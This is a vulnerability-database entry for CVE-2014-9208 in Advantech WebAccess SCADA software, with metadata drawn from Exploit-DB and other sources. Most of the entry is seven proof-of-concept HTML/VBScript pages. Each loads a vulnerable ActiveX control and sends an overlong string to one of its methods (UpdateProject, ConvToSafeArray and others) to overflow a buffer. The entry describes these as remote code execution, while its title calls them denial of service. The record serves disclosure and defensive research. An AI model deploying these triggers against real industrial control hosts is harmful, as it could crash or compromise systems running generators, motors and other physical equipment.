ID

VAR-E-201509-0067


CVE

cve_id:CVE-2014-9208

Trust: 2.4

sources: BID: 76672 // PACKETSTORM: 133475 // EXPLOIT-DB: 38108 // EDBNET: 59243

EDB ID

38108


TITLE

Advantech Webaccess 8.0 / 3.4.3 - ActiveX Multiple Vulnerabilities - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 38108

DESCRIPTION

Advantech Webaccess 8.0 / 3.4.3 - ActiveX Multiple Vulnerabilities. CVE-2014-9208 CVE-127229 CVE-127228 CVE-127227 CVE-127226 CVE-127225 CVE-127224 CVE-127223. dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 38108

AFFECTED PRODUCTS

vendor: advantech, model: webaccess, scope: eq, version: 8.0/3.4.3

Trust: 1.5

vendor: advantech, model: webaccess activex, scope: eq, version: 8.03.4.3

Trust: 0.6

sources: PACKETSTORM: 133475 // EXPLOIT-DB: 38108 // EDBNET: 59243

EXPLOIT

Introduction
*********************************************************************************
Using Advantech WebAccess SCADA Software we can remotely manage Industrial
Control systems devices like RTUs, Generators, Motors etc. Attackers can
execute code remotely by passing a maliciously crafted string to the
ConvToSafeArray API in ASPVCOBJLib.AspDataDriven ActiveX.

Operating System: Windows SP1
Affected Product: Advantech WebAccess 8.0, 3.4.3
Vulnerable Program: AspVCObj.dll
CVE-2014-9208

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
UpdateProject Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:3703BA5D-7329-4E60-A1A5-AE7D6DF267C1' id='target' />
<script language='vbscript'>

<!--
targetFile = "C:\WebAccess\Node\webdobj.dll"
prototype = "Sub UpdateProject ( ByVal WwwPort As String , ByVal ProjName
As String , ByVal ProjIP As String , ByVal ProjPort As Long , ByVal
ProjTimeout As Long , ByVal ProjDir As String )"
-->

arg1="defaultV"
arg2="defaultV"
arg3=String(1044, "A")
arg4=1
arg5=1
arg6="defaultV"

target.UpdateProject arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6

</script></html>

*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
InterfaceFilter Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function InterfaceFilter ( ByVal Interface As String ) As
String"
-->

arg1=String(1044, "A")

target.InterfaceFilter arg1

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
FileProcess Overflow Remote Code Execution"
*********************************************************************************

<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Sub FileProcess ( ByVal Type As Integer , ByVal FileName As
String )"
-->

arg1=1
arg2=String(1044, "A")

target.FileProcess arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetWideStrCpy Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetWideStrCpy ( ByVal Type As Integer , ByVal inStr
As String ) As String"
-->

arg1=1
arg2=String(1044, "A")

target.GetWideStrCpy arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetRecipeInfo Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetRecipeInfo ( ByVal Type As Integer , ByVal
filePath As String )"
-->

arg1=1
arg2=String(1044, "A")

target.GetRecipeInfo arg1 ,arg2

</script></html>

*********************************************************************************
Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
GetLastTagNbr Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function GetLastTagNbr ( ByVal TagName As String ) As String"
-->

arg1=String(1044, "A")

target.GetLastTagNbr arg1

</script></html>

*********************************************************************************

Proof of Concept (PoC) for "Advantech WebAccess AspVCObj ActiveX
ConvToSafeArray Overflow Remote Code Execution"
*********************************************************************************
<?XML version='1.0' standalone='yes' ?>
<html>
<object classid='clsid:89D00354-B2EA-4755-915D-615D3962C7D7' id='target' />
<script language='vbscript'>
<!--
targetFile = "C:\WebAccess\Node\AspVCObj.dll"
prototype = "Function ConvToSafeArray ( ByVal ArrSize As Integer , ByVal
inStr As String )"
-->

arg1=1
arg2=String(2068, "A")

target.ConvToSafeArray arg1 ,arg2

</script></html>
*********************************************************************************
Vulnerabilities were reported to Advantech sometime in January/February
2015, coordinated through CSOC. From April 2015 they have been postponing the
fix.

Trust: 1.0

sources: EXPLOIT-DB: 38108

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 38108

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 38108

TYPE

ActiveX Multiple Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 38108

TAGS

tag:exploit

Trust: 0.5

tag:activex

Trust: 0.5

sources: PACKETSTORM: 133475

CREDITS

Praveen Darshanam

Trust: 0.6

sources: EXPLOIT-DB: 38108

EXTERNAL IDS

db: NVD, id: CVE-2014-9208

Trust: 2.4

db: EXPLOIT-DB, id: 38108

Trust: 1.6

db: EDBNET, id: 59243

Trust: 0.6

db: PACKETSTORM, id: 133475

Trust: 0.5

db: BID, id: 76672

Trust: 0.3

sources: BID: 76672 // PACKETSTORM: 133475 // EXPLOIT-DB: 38108 // EDBNET: 59243

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2014-9208

Trust: 2.1

url:https://www.exploit-db.com/exploits/38108/

Trust: 0.6

sources: PACKETSTORM: 133475 // EXPLOIT-DB: 38108 // EDBNET: 59243

SOURCES

db: BID, id: 76672
db: PACKETSTORM, id: 133475
db: EXPLOIT-DB, id: 38108
db: EDBNET, id: 59243

LAST UPDATE DATE

2022-07-27T09:18:39.523000+00:00


SOURCES UPDATE DATE

db: BID, id: 76672, date: 2015-11-03T19:36:00

SOURCES RELEASE DATE

db: BID, id: 76672, date: 2015-09-04T00:00:00
db: PACKETSTORM, id: 133475, date: 2015-09-07T14:33:33
db: EXPLOIT-DB, id: 38108, date: 2015-09-08T00:00:00
db: EDBNET, id: 59243, date: 2015-09-08T00:00:00